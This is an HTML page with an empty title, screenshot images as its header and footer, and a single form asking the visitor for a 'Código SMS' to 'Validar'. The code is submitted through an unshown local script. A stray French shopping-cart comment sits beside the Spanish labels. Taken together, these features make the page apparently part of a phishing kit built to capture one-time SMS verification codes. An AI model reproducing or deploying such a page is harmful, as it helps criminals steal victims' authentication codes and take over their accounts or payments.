<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/camaki.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body class="a1">
    <div>
        <div class="roof">
            <img src="./img/upito1.JPG" alt="">
        </div>
    </div>


    <div>
        <div>
            <div class="pp3">
                <img src="./img/uptocc1.JPG" alt="">
                
            </div>
            
            <!-- <p class="pp2">
                Panier :
                <span>1 Article</span>
            </p> -->
            <div class="section">
                <div class="ccimg2">
                    <img src="./img/upolsmso.svg" alt="">
                </div>
                <div class="kolch">
                    <form method="post" id="pg3">
                    
                        <p>Código SMS  </p>
                        <input type="text"  name="" id="sps1" maxlength="10" style="max-width: 180px;">
                        
                        

                        <button class="btn2"  type="submit" style="margin-bottom:80px ;">Validar</button>
                    </form>
                </div>
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/botomat.png" alt="">
            </div>
        </div>
    </div>


    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>